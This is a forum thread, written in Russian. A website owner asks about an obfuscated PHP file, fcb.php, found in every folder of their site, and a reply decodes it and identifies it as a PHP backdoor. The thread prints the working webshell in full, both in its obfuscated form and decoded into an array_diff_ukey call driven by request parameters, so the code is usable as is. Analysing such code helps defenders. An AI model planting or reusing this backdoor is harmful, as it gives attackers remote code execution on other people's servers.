Вот сценарий PHP, который я нашел в корне каждой папки моего веб-сайта. Имя скрипта - fcb.php
Содержание:
<? $GLOBALS['_1303753477_']=Array(base64_decode('YX' .'JyYXlfZGlmZl91a2V5'),base64_decode('c3RyaXBz' .'bG' .'F' .'z' .'aGVz')); ?><? function _1935386521($i){$a=Array('cGFzc3dvcmQ=','cmVfcGFzc3dvcmQ=','bG9naW4=');return base64_decode($a[$i]);} ?><?php @$GLOBALS['_1303753477_'][0](@array((string)$_REQUEST[_1935386521(0)]=>round(0+0.25+0.25+0.25+0.25)),@array((string)$GLOBALS['_1303753477_'][1]($_REQUEST[_1935386521(1)])=>round(0+0.4+0.4+0.4+0.4+0.4)),$_REQUEST[_1935386521(2)]); ?>
Может кто-нибудь объяснить, что это делает? Спасибо.
Это определенно похоже на какое-то вредоносное ПО. Мой PHP ржавый; насколько я могу его расшифровать, он выглядит так:
<?php array_diff_ukey(@array((string)$_REQUEST[password]=>1),
@array((string)stripslashes($_REQUEST[re_password])=>2),
$_REQUEST[login]); ?>
Затем поиск в Google того, что делает "stripslashes $ _request re_password", привел меня к множеству сайтов, предупреждающих о бэкдорах PHP.